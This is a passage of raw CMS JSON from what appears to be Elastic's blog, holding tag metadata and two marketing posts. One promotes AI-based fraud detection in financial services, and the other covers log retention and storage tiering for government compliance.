ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt484a944a3d130219","ACL":{},"created_at":"2023-11-06T20:39:33.494Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fraud-detection","label_l10n":"Fraud detection","tags":[],"title":"Fraud detection","updated_at":"2023-11-06T20:39:33.494Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.155Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":3,"locale":"en-us","uid":"blt3ff56eb3b9c58312","ACL":{},"created_at":"2020-06-17T03:33:18.405Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":true,"keyword":"business-analytics","label_l10n":"Business analytics","tags":[],"title":"Business analytics","updated_at":"2020-07-06T22:20:18.826Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.556Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"bltcc47211deeca9178","_version":1,"title":"data-logging-IT-executives-A (1).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-27T18:45:08.502Z","updated_at":"2025-01-27T18:45:08.502Z","content_type":"image/jpeg","file_size":"144911","filename":"data-logging-IT-executives-A_(1).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-27T18:47:15.550Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltcc47211deeca9178/6797d434cef122977c277316/data-logging-IT-executives-A_(1).jpg"},"title":"Getting it right with GenAI in financial services: Where to focus in 2025","title_l10n":"Getting it right with GenAI in financial services: Where to focus in 2025","updated_at":"2025-01-27T18:47:09.012Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/generative-ai-financial-services","publish_details":{"time":"2025-01-27T18:47:14.778Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt5750a232d9d4807d","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Discover how Elastic uses AI and ML to revolutionize fraud detection in financial services. From real-time anomaly detection to predictive analytics, learn how institutions can combat fraud, ensure compliance, and enhance trust with our solutions.","author":["bltce462b8f0bc7868a"],"category":["bltb79594af7c5b4199"],"created_at":"2025-01-24T11:43:00.368Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0012969d4305b2b1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFraud in financial services is becoming more sophisticated, costing the industry billions annually and eroding customer trust. Recently, Deloitte published an \u003c/span\u003e\u003ca href=\"https://www2.deloitte.com/us/en/insights/industry/financial-services/financial-services-industry-predictions/2024/deepfake-banking-fraud-risk-on-the-rise.html\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003earticle\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e highlighting the risk AI brings in the form of fraudsters to the financial services industry: \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e“Fake content has never been easier to create — or harder to catch. As threats grow, banks can invest in AI and other technologies to help detect fraud and prevent losses.”\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe article reports an incident in\u003c/span\u003e\u003cspan style='color:rgb(31, 31, 31);font-size: 12pt;'\u003e January 2024 where an employee at a Hong Kong-based firm sent $25 million to fraudsters after being instructed to do so by her CFO on a video call that also included other colleagues. It turned out, however, that she wasn’t on a call with any of these people. Instead, fraudsters created a deepfake that replicated their likenesses to trick her into sending the money.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIronically, as much as AI can bring risk, it can also be used to combat fraud — fighting fire with fire. At Elastic, we are already working with our financial services clients and offering them our robust Search AI Platform to detect, prevent, and mitigate fraud effectively.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The role of AI in financial fraud detection","_metadata":{"uid":"cs7044a1c1f0d899a6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI introduces unprecedented precision and scalability in fraud detection by analyzing vast datasets in real time. It excels in identifying subtle patterns that traditional rule-based systems might miss, such as:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAnomalous transaction patterns:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e AI and machine learning (ML) models detect irregularities in transaction volumes, values, or geographies — flagging potential fraud attempts like money laundering or anomalous fund transfers.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBehavioral analytics:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e AI-powered tools identify deviations in user behavior, such as unusual login attempts or account activity, to combat account takeover (ATO) techniques.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003ePredictive analytics:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e ML models predict potential fraud scenarios, enabling preemptive actions rather than reactive responses.\u003c/span\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Elastic: A unified approach to fraud detection","_metadata":{"uid":"csac5513fc30fdb533"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic enhances fraud detection through a distributed \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-security-ai-security-analytics-solution\"\u003e\u003cspan style='font-size: 12pt;'\u003edata mesh architecture\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and AI-driven analytics. By integrating machine learning, Elastic automates the identification of unknown anomalies while reducing false positives. Key features include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eReal-time alerts: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eHigh-fidelity alerts are generated from AI-driven rules and ML algorithms.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eThreat intelligence integration:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Custom and prebuilt integrations enrich data with actionable insights.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eScalable data processing: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eThe Elastic Search AI Platform processes massive data volumes across hybrid, on-premises, or cloud environments.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Real-world use cases","_metadata":{"uid":"cs4b99079a88fd4f00"},"header_style":"H2","paragraph_l10n":"\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eAccount takeovers (ATO):\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Elastic detects brute force attacks, password spraying, and enumeration activities, empowering analysts to act swiftly.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eTransaction stacking:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e AI identifies suspicious sequences, such as deposits and withdrawals in rapid succession or amounts just below regulatory thresholds.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eFraudulent account detection:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e AI algorithms pinpoint unusual patterns in account creation or funding, flagging potentially fraudulent activities.\u003c/span\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"The future of fraud detection with AI","_metadata":{"uid":"cs107b75380486c7ff"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs financial fraud continues to evolve, institutions need proactive solutions to stay ahead. The Elastic Search AI Platform exemplifies how AI and machine learning can revolutionize fraud detection — ensuring compliance, reducing operational costs, and restoring customer confidence.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo learn more about how Elastic uses AI to combat fraud, download \u003c/span\u003e\u003ca href=\"https://www.elastic.co/accelerate-fraud-detection-and-prevention-with-elastic\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eDetecting Financial Fraud with Elastic Security\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs80a554a0193ce2f8"}}},{"callout":{"title_l10n":"","_metadata":{"uid":"cs1ab532b291405dd1"},"paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eRelated resources\u0026nbsp;\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog:\u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-global-data-mesh-security-governance-policy\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Using Elastic as a global data mesh: Unify data access with security, governance, and policy\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eBlog:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/financial-services-fraud-generative-ai-attack-surface\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eFraud in financial services: Leaning on generative AI to protect a rapidly expanding attack surface\u003c/span\u003e\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","callout_reference":[],"callout_type":"Information (info)"}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs9baa5b1b01a58603"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa959fce40e983fb5"}}}],"publish_date":"2025-01-24","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Transforming fraud detection: AI and Elastic Security in financial services","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","title":"Anomaly detection","label_l10n":"Anomaly detection","keyword":"anomaly-detection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7478459fe32592c5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:06.777Z","updated_at":"2023-11-06T20:08:06.777Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.738Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt484a944a3d130219","ACL":{},"created_at":"2023-11-06T20:39:33.494Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"fraud-detection","label_l10n":"Fraud detection","tags":[],"title":"Fraud detection","updated_at":"2023-11-06T20:39:33.494Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.155Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"title":"Machine learning","label_l10n":"Machine learning","keyword":"machine-learning","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt65b9df038275be61","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:38:34.860Z","updated_at":"2020-06-17T03:38:46.799Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:38:34.860Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-01T17:16:32.546Z","user":"blt3044324473ef223b70bc674c"}},{"title":"Monitoring","label_l10n":"Monitoring","keyword":"monitoring","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt018d981515b9a4fd","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:39:24.931Z","updated_at":"2020-06-17T03:39:59.356Z","_content_type_uid":"tags_topic","ACL":{},"_version":2,"_workflow":{"uid":"blte3b720fd9661d254","updated_at":"2020-06-17T03:39:24.931Z","updated_by":"blt3044324473ef223b70bc674c","version":1},"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-07-02T18:15:31.077Z","user":"bltf6ab93733e4e3a73"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltdeb5e512cabf0e10","ACL":{},"created_at":"2023-11-03T17:34:50.549Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"platform","label_l10n":"Platform","tags":[],"title":"Platform","updated_at":"2023-11-03T17:34:53.443Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.235Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt6f00e40aaa5c6f0e","ACL":{},"created_at":"2020-06-17T03:32:57.128Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"siem","label_l10n":"SIEM","tags":[],"title":"SIEM","updated_at":"2020-07-06T22:20:05.385Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.450Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt99c7954938807ad0","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2025-01-24T11:42:58.412Z","created_by":"bltb6c155cd84fc0c1a","file_size":"161053","filename":"158175_-_Blog_header_image_3_(1).jpg","parent_uid":null,"tags":[],"title":"158175 - Blog header image_3 (1).jpg","updated_at":"2025-01-24T11:42:58.412Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2025-01-24T13:55:03.125Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt99c7954938807ad0/67937cc29d626e57a411f53d/158175_-_Blog_header_image_3_(1).jpg"},"title":"AI-powered fraud detection: Protecting financial services with Elastic","title_l10n":"AI-powered fraud detection: Protecting financial services with Elastic","updated_at":"2025-01-24T11:45:03.726Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-ai-fraud-detection-financial-services","publish_details":{"time":"2025-01-24T13:55:03.020Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta1c85c7f4825febb","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"Government organizations are required to meet strict standards for log storage and cybersecurity compliance. The Elasticsearch logsdb index mode enables government agencies to meet these requirements while reducing data storage costs. ","author":["blt102f294afc79629a"],"category":["bltb79594af7c5b4199"],"created_at":"2025-01-23T14:56:05.137Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6016bb3446a9bc3c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn the digital era, state and local governments are increasingly tasked with managing vast volumes of data while ensuring compliance with stringent regulatory requirements. These regulations, which can vary significantly depending on jurisdiction, often require the retention of data for extended periods — sometimes ranging from one to seven years. Compliance with standards, such as Criminal Justice Information Services (CJIS), Health Insurance Portability and Accountability Act (HIPAA), and Payment Card Industry Data Security Standard (PCI DSS), is not just a legal obligation but also a critical component of maintaining public trust and operational integrity. Elastic Cloud offers robust solutions to help government entities meet these compliance needs efficiently and cost-effectively.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Reducing data storage costs with Elasticsearch logsdb index mode","_metadata":{"uid":"cs9532e1ce70c11ce4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"color: rgb(29, 28, 29);font-size: 12pt;\"\u003eThe recently introduced \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/whats-new-elastic-8-17-0#elasticsearch-logsdb-index-mode\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElasticsearch logsdb index mode\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e is designed to significantly reduce data storage costs by efficiently storing and searching essential log data. Logsdb index mode can \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-logsdb-index-mode\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecut data storage costs by up to 65%\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, making it an ideal choice for public sector organizations aiming to optimize their data management budgets. By using logsdb index mode, government agencies can maintain comprehensive log data for compliance and auditing purposes without incurring prohibitive costs. This capability ensures that critical log data remains accessible and manageable, supporting long-term data retention strategies while adhering to budget constraints.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic's data tiering strategy: Ingest and search/archive","_metadata":{"uid":"cs6b75d8c43e2a9aa4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eUnlike other vendors, Elastic's data tiering approach optimizes data management by categorizing data into storage tiers based on access frequency and cost:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eHot tier:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Designed for frequently accessed, critical data that you need to analyze quickly. Data in the hot tier is typically retained for one to seven days for immediate analysis.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCold tier:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Suitable for infrequently accessed, read-only data, using low-cost object storage like AWS S3. It balances cost and performance through caching and partial restores.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eFrozen tier:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Ideal for long-term retention, storing data entirely in object storage for up to two years or longer. Elastic's unique searchable snapshots capability enables direct searches without any rehydration, maintaining efficient search performance. Most Elastic customers have been adopting a hot-frozen architecture, where data is stored for one to three days in the hot tier, and the rest are in the frozen tier. This approach significantly reduces costs while retaining high levels of search performance.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 